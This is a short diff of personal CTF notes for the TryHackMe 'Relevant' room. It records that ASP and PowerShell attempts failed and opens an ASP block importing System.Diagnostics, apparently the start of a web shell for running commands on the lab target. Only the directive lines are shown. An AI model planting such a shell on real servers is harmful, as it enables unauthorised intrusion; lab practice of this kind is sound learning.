7RU7H/CTFs/TryHackMe/Markdown/Relevant/Relevant-WTFisTHIS.md

 Note - Nothing in this room requires Metasploit

-Learn some ASP - does not work
+Learn some ASP - does not work,  just powershell does not work
 ```asp
 <%@ Page Language="C#" Debug="true" Trace="false" %>
 <%@ Import Namespace="System.Diagnostics" %>